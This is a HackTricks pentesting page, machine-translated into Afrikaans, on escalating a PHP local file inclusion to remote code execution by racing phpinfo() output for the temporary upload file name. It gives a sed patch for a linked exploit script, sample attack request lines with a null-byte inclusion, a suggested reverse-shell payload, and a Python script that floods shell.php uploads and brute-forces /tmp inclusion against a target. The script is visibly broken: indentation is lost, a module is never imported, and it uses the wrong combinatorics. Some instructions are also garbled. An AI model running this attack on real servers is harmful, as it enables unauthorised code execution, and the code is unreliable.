LFI2RCE via phpinfo()

Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

As jy jou maatskappy geadverteer wil sien in HackTricks of HackTricks in PDF wil aflaai, kyk na die SUBSCRIPTION PLANS!
Kry die amptelike PEASS & HackTricks swag
Ontdek The PEASS Family, ons versameling eksklusiewe NFTs
Sluit aan by die 💬 Discord-groep of die telegram-groep of volg ons op Twitter 🐦 @carlospolopm.
Deel jou hacking-truuks deur PR's in te dien by die HackTricks en HackTricks Cloud github-opslag.

Om van hierdie kwesbaarheid gebruik te maak, benodig jy: 'n LFI-kwesbaarheid, 'n bladsy waar phpinfo() vertoon word, "file_uploads = on" en die bediener moet in staat wees om in die "/tmp" gids te skryf.

https://www.insomniasec.com/downloads/publications/phpinfolfi.py

Tutorial HTB: https://www.youtube.com/watch?v=rs4zEwONzzk&t=600s

Jy moet die uitbuiting regstel (verander => na =>). Jy kan dit doen deur:

sed -i 's/\[tmp_name\] \=>/\[tmp_name\] =\&gt/g' phpinfolfi.py

Jy moet ook die payload aan die begin van die aanval verander (byvoorbeeld vir 'n php-rev-shell), die REQ1 (dit moet na die phpinfo-bladsy wys en die padding ingesluit hê, bv.: REQ1="""POST /install.php?mode=phpinfo&a="""+padding+""" HTTP/1.1), en LFIREQ (dit moet na die LFI kwesbaarheid wys, bv.: LFIREQ="""GET /info?page=%s%%00 HTTP/1.1\r -- Kyk na die dubbele "%" wanneer jy die null karakter uitbuit)

212KB

LFI-With-PHPInfo-Assistance.pdf

pdf

Teorie

As oplaai toegelaat word in PHP en jy probeer 'n lêer oplaai, word hierdie lêer gestoor in 'n tydelike gids totdat die bediener klaar is met die verwerking van die versoek, waarna hierdie tydelike lêer verwyder word.

Dan, as jy 'n LFI kwesbaarheid in die webbediener gevind het, kan jy probeer raai wat die naam van die tydelike lêer is en 'n RCE uitbuit deur toegang tot die tydelike lêer te verkry voordat dit verwyder word.

In Windows word die lêers gewoonlik gestoor in C:\Windows\temp\php

In Linux is die naam van die lêer gewoonlik willekeurig en geleë in /tmp. Aangesien die naam willekeurig is, moet dit uit êrens die naam van die tydelike lêer onttrek en dit toegang voordat dit verwyder word. Dit kan gedoen word deur die waarde van die variable $_FILES binne die inhoud van die funksie "phpconfig()" te lees.

phpinfo()

PHP gebruik 'n buffer van 4096B en wanneer dit vol is, word dit gestuur na die kliënt. Dan kan die kliënt baie groot versoek stuur (met groot koppe) om 'n php omgekeerde skulp te oplaai, wag vir die eerste deel van die phpinfo() om terug te keer (waar die naam van die tydelike lêer is) en probeer om toegang tot die tydelike lêer te verkry voordat die php-bedienaar die lêer verwyder deur 'n LFI kwesbaarheid uit te buit.

Python-skripsie om te probeer om die naam te raai (as lengte = 6)

import itertools
import requests
import sys

print('[+] Trying to win the race')
f = {'file': open('shell.php', 'rb')}
for _ in range(4096 * 4096):
requests.post('http://target.com/index.php?c=index.php', f)


print('[+] Bruteforcing the inclusion')
for fname in itertools.combinations(string.ascii_letters + string.digits, 6):
url = 'http://target.com/index.php?c=/tmp/php' + fname
r = requests.get(url)
if 'load average' in r.text:  # <?php echo system('uptime');
print('[+] We have got a shell: ' + url)
sys.exit(0)

print('[x] Something went wrong, please try again')

Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!

Ander maniere om HackTricks te ondersteun:

As jy wil sien dat jou maatskappy geadverteer word in HackTricks of HackTricks aflaai in PDF-formaat, kyk na die SUBSCRIPTION PLANS!
Kry die amptelike PEASS & HackTricks swag
Ontdek The PEASS Family, ons versameling eksklusiewe NFTs
Sluit aan by die 💬 Discord-groep of die telegram-groep of volg ons op Twitter 🐦 @carlospolopm.
Deel jou hacking-truuks deur PR's in te dien by die HackTricks en HackTricks Cloud GitHub-opslagplekke.

PreviousLFI2RCE via Segmentation Fault NextLFI2RCE Via temp file uploads

Last updated 2 months ago